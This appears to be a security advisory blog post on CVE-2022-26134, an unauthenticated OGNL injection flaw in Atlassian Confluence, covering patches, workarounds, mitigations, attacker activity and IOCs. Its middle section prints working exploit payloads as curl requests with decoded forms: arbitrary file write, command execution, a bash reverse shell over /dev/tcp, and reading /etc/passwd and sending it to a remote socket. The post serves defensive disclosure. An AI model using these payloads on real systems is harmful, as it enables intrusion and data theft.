CVE-2022-26134. Zero Day vulnerability affecting Atlassian Confluence

03 - Jun - 2022 - Oscar Mallo

Table of Contents

A remote code execution vulnerability affecting Atlassian Confluence products has recently been identified and assigned CVE-2022-26134. This vulnerability is exploitable without requiring authentication and being actively exploited.

According to the initial analysis, the vulnerability is a code injection (OGNL Inyection), similar to other vulnerabilities that have been reported on other occasions.

Products affected by vulnerability CVE-2022-26134

Atlassian Confluence Server.
Atlassian Confluence Data Center.

According to official information published by Atlassian, all versions of Confluence Server and Data Center have been affected by CVE-2022-26134 vulnerability .

CVE-2022-26134 Workarounds and security patches

Patch for the Atlassian confluence vulnerability

Atlassian has released the following versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a fix for this issue.

Atlassian recommends upgrading to the latest Long Term Support release. The latest version can be downloaded from the Atlassian download centre.

If its not possible to upgrade Confluence immediately, a temporary workaround has been published-

CVE-2022-26134 Workaround

For Confluence 7.15.0 – 7.18.0

If Confluence runs in a cluster, this process will need to be repeated on each node. It is not necessary to shut down the whole cluster.

Shut down Confluence.
Download the following file to the Confluence server:

xwork-1.0.3-atlassian-10.jar

Delete the following file from the Confluence install directory

<confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3-atlassian-8.jar

Copy the downloaded xwork-1.0.3-atlassian-10.jar into:

<confluence-install>/confluence/WEB-INF/lib/

Check that permissions and ownership of xwork-1.0.3-atlassian-10.jar file matches the existing files in the same directory.
Start Confluence.

For Confluence 7.0.0 – Confluence 7.14.2

Shut down Confluence.
Download the following files to the Confluence server:

xwork-1.0.3-atlassian-10.jar

webwork-2.1.5-atlassian-4.jar

CachedConfigurationProvider.class

Delete the following files from the Confluence install directory:

<confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3.6.jar

<confluence-install>/confluence/WEB-INF/lib/webwork-2.1.5-atlassian-3.jar

Copy the downloaded xwork-1.0.3-atlassian-10.jar into <confluence-install>/confluence/WEB-INF/lib/
Copy the downloaded webwork-2.1.5-atlassian-4.jar into <confluence-install>/confluence/WEB-INF/lib/
Check that permissions and ownership of both new files matches the existing files in the same directory.
Change context to the following directory <confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup

7.1 Create a new directory called webwork

7.2 Copy CachedConfigurationProvider.class into:

<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork

7.3 Ensure the permissions and ownership are correct for:

<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork

7.4 Ensure the permissions and ownership are correct for:

<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork/CachedConfigurationProvider.class

8 Start Confluence.

Additional mitigations

The Atlassian security team has defined the following workarounds:

Disable or restrict access to Confluence Server and Data Center instances exposed to the Internet.
If the previous workaround is not possible, define rules at the WAF level blocking URLs that contain the sequence ${.

Server hardening techniques should also be taken into consideration. It is recommended to verify that Confluence Server is being executed as a non privileged user, verify that the server operating system in fully patched and has been restarted to ensure it is running a kernel without known vulnerabilities. Similarly, deploying an EDR agent could be very beneficial in detecting or preventing exploits or subsequent privilege escalations.

Given that the technical details of the exploit are already known and a patch exists, vulnerable systems need to be updated now.

Active exploit of vulnerability CVE-2022-26134

According to the analysis of the incident response process executed by Volexity last weekend, malicious activity was identified affecting Atlassian Confluence Server products. This analysis has been verified by rapid7, providing a large number of examples of these exploits.

Arbitrary file Write

Curl -v https://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/

Which executes the following code:

${@java.lang.Runtime@getRuntime().exec(“touch /tmp/pwned”)}

Command execution

The following request executes the whoami command and returns the result of the command in the X-Cmd-Response header.

Curl -v https://10.0.0.28:8090/%24%7B%28%23ª%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23ª%29%29%7D/

This payload is decoded as follows:

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“whoami”).getInputStream(),”utf-8”)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#a))}

Reverse Shell

curl -v https://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

again, the decoded code is as follows:

${new javax.script.ScriptEngineManager().getEngineByName(“nashorn”).eval(“new java.lang.ProcessBuilder().command(‘bash’,’-c’,’bash -i >& /dev/tcp/10.0.0.28/1270 0>&1′).start()”)}

Arbitrary file read: /etc/password

curl -v https://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/

decoded as:

${new javax.script.ScriptEngineManager().getEngineByName(“nashorn”).eval(“var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get(‘/etc/passwd’)));var sock = new java.net.Socket(‘10.0.0.28’, 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();”)}

Attacks in progress

Analysis of the CVE-2022-26134 vulnerability in the context of current active exploitation campaigns has shown the following activities.

Initial code execution and creation of child processes that invoke different shells (bash and python).
JSP webshells being written to disk.
- Overwriting of existing Confluence Server resources to incorporate a webshell. Specifically, the following file:
  - confluence root>/confluence/noop.jsp
- Deployment of other webshells to ensure access persistence to compromised systems, including a variant of the JSP China Chopper webshell, which has previously been used by various malicious actors. [1][2][3]
Deployment of the open source Behinder implant to allow a memory resident webshell (without the need to write to disk) and with interaction capabilities with meterpreter and Cobalt Strike.

The CVE-2022-26134 vulnerability has been added to the catalog of known exploited vulnerabilities compiled by the US government agency CISA (Cybersecurity & Infrastructure Security Agency).

IOCs

The following link includes indicators of compromise based on IP addresses involved in the current exploit campaign, as well as yara rules.

https://github.com/volexity/threat-intel/tree/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators

Information of the webshells deployed in the context of the analyzed campaign is shown below:

Modified noop.jsp resource.

Filename	noop.jsp
File Size	537 bytes
Hash MD5	f8df4dd46f02dc86d37d46cf4793e036
Hash SHA1	4c02c3a150de6b70d6fca584c29888202cc1deef

Webshell JSP China Chopper variant.

Filename	*.jsp
File Size	8624 bytes
Hash MD5	ea18fb65d92e1f0671f23372bacf60e7
Hash SHA1	80b327ec19c7d14cc10511060ed3a4abffc821af

References

Zero-Day Exploitation of Atlassian Confluence – https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
Security advisory issued by Atlassian – https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Security Alert CVE-2022-26134 issued by BugAlert – https://bugalert.org/content/notices/2022-06-02-confluence.html?src=tw
IOCs – https://github.com/volexity/threat-intel/tree/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators
Reglas SIGMA – https://github.com/SigmaHQ/sigma/pull/3087/commits/777b123ad0e673e30eb8b6c566dc353b338f0e87
CISA – Known Exploited vulnerability catalog – https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog
China Chopper Webshell – https://attack.mitre.org/software/S0020/
Rapid7 analysis – https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134

Share this article

Facebook - Twitter - Linkedin